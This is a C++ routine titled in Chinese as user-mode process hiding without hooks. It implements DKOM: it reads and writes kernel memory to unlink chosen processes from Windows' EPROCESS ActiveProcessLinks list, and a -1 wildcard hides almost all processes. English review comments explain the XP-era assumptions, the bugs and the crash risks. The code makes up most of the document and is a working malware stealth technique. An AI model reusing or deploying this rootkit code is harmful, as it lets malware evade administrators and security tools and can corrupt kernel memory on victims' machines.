关于进程隐藏(Ring3,不用Hook)
// Unlinks a process from the kernel's EPROCESS ActiveProcessLinks list from
// user mode (Ring3) without installing any hook.  Every kernel access goes
// through MemoryMgr::LinearMemoryGetSafe / LinearMemoryPutSafe, which are
// declared elsewhere in the project (presumably a raw kernel-memory mapper;
// not visible here - TODO confirm).  This is classic DKOM: the process keeps
// running, but disappears from enumerations that walk ActiveProcessLinks.
//
// Victim selection, in the order the code tests it:
//   dwProcessID != 0                 hide the process with this PID
//   dwProcessID == 0 && szExeName    hide every process whose EPROCESS image
//                                    name equals the basename of szExeName
//                                    (case-insensitive)
//   both empty                       hide the calling process
//   dwProcessID == (ULONG)-1         undocumented wildcard: unlinks EVERY
//                                    process with PID > 8 (see the match
//                                    condition in the loop) - a foot-gun.
//
// Returns TRUE once the walk completes, 0 on the first failed kernel read.
// NOTE(review): the return value does not say whether anything was actually
// unlinked, and a failed kernel WRITE is never reported (see below).
//
// Assumptions baked into this routine (32-bit, XP-era, single-processor):
//   * 0xFFDFF124 is a fixed kernel address commented as "CurrentThread"
//     (matches KPCR.Prcb.CurrentThread on 32-bit XP-era kernels - confirm).
//     It is wrong for other processors' KPCRs and for later Windows versions;
//     on 64-bit / KASLR / PatchGuard-protected kernels the whole technique
//     does not apply.
//   * m_uEProcessOffset, m_uFlinkOffset, m_uBlinkOffset, m_uProcessIDOffset
//     and m_uProcessNameOffset are EPROCESS/KTHREAD field offsets resolved
//     elsewhere in the class (not visible here).  A wrong offset turns the
//     writes below into silent kernel memory corruption.
ULONG CProcessMgrEx::HideProcess ( ULONG dwProcessID, LPSTR szExeName )
{
    ULONG bByProcessID;
    if ( dwProcessID != NULL )   // NOTE(review): ULONG compared with NULL; 0 is meant
    {
        bByProcessID = TRUE;
    }
    else if ( szExeName != NULL )
    {
        bByProcessID = FALSE;
        // Keep only the file name: the kernel's image-name field holds no path.
        // NOTE(review): _T / _tcsrchr are TCHAR APIs applied to an LPSTR, so this
        // only compiles in a non-UNICODE build.  The escaped character constant
        // below looks mangled by extraction; the evident intent is a backslash.
        LPSTR lpszShortName = _tcsrchr ( szExeName, _T ( \'\\\\\' ) );
        if ( lpszShortName != NULL ) szExeName = lpszShortName + 1;
    }
    else
    {
        dwProcessID = ::GetCurrentProcessId ( );
        bByProcessID = TRUE;
    }

    BYTE pBuffer [ 0x1000 ];            // snapshot of one EPROCESS (first 4 KiB only)
    ULONG pListEntryHead, pListEntryPtr;
    ULONG uAddress;

    // Fixed address -> KTHREAD of the calling thread ("CurrentThread").
    uAddress = 0xFFDFF124;
    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) ) return 0;

    // KTHREAD.ApcState.Process -> EPROCESS of the calling process.
    uAddress += m_uEProcessOffset;
    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) ) return 0;

    // EPROCESS.ActiveProcessLinks.Flink -> list entry of the next process.
    uAddress += m_uFlinkOffset;
    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) ) return 0;
    pListEntryHead = uAddress;

    // One more hop: the walk starts at the entry after pListEntryHead.
    // NOTE(review): the loop below stops when it gets back to pListEntryHead,
    // so the process that OWNS pListEntryHead (the one immediately after the
    // caller in the list) is never examined and can never be hidden here.
    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) ) return 0;
    pListEntryPtr = uAddress;

    /* Walk the circular ActiveProcessLinks list once. */
    do
    {
        // List entry address -> EPROCESS base; copy the object out of the kernel.
        uAddress = pListEntryPtr - m_uFlinkOffset;
        if ( ! MemoryMgr::LinearMemoryGetSafe ( pBuffer, uAddress, 0x1000 ) ) return 0;

        ULONG dwUniqueProcessId = * ( ( ULONG * ) ( pBuffer + m_uProcessIDOffset ) );
        LPSTR lpszImageFileName = ( LPSTR ) ( pBuffer + m_uProcessNameOffset );
        ULONG dwFlink, dwBlink;
        dwFlink = * ( ( ULONG * ) ( pBuffer + m_uFlinkOffset ) );
        dwBlink = * ( ( ULONG * ) ( pBuffer + m_uBlinkOffset ) );

        // Match: wildcard (-1 -> every PID above 8), by PID, or by image name.
        // NOTE(review): the kernel image-name field is a short fixed-size
        // buffer (16 bytes on the targeted kernels - confirm); _tcsicmp relies
        // on finding a terminator somewhere inside pBuffer, and names the
        // kernel truncated will never compare equal to the full basename.
        if ( ( dwProcessID == - 1 && dwUniqueProcessId > 8 )
            || ( bByProcessID && dwProcessID == dwUniqueProcessId )
            || ( ! bByProcessID && ! _tcsicmp ( szExeName, lpszImageFileName ) ) )
        {
            // Kernel addresses are reinterpreted as LIST_ENTRY* ONLY to compute
            // the addresses of the neighbours' Blink / Flink fields; they are
            // never dereferenced from user mode.
            PLIST_ENTRY pFlinkList = ( PLIST_ENTRY ) dwFlink;
            PLIST_ENTRY pBlinkList = ( PLIST_ENTRY ) dwBlink;

            /* Unlink: next->Blink = our Blink, prev->Flink = our Flink.  The
               victim's own entry is left pointing at its old neighbours so
               kernel code still holding a pointer to it keeps working. */
            // NOTE(review): the two writes are not atomic with respect to the
            // kernel and neither return value is checked.  If the first write
            // lands and the second fails, the list is left half-unlinked and
            // the next enumeration bugchecks.  Raising the thread priority
            // narrows the window but does not close it; the second
            // TIME_CRITICAL call is redundant (priority is already raised).
            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_TIME_CRITICAL );
            MemoryMgr::LinearMemoryPutSafe ( & dwBlink, ( ULONG ) & pFlinkList -> Blink, sizeof ( ULONG ) );
            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_TIME_CRITICAL );
            MemoryMgr::LinearMemoryPutSafe ( & dwFlink, ( ULONG ) & pBlinkList -> Flink, sizeof ( ULONG ) );
            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_NORMAL );
        }

        // Advance via the snapshot's Flink, which is unaffected by the unlink above.
        pListEntryPtr = dwFlink;
    }
    while ( pListEntryPtr != NULL && pListEntryPtr != pListEntryHead );

    // TRUE regardless of whether any entry matched or any write succeeded.
    return TRUE;
}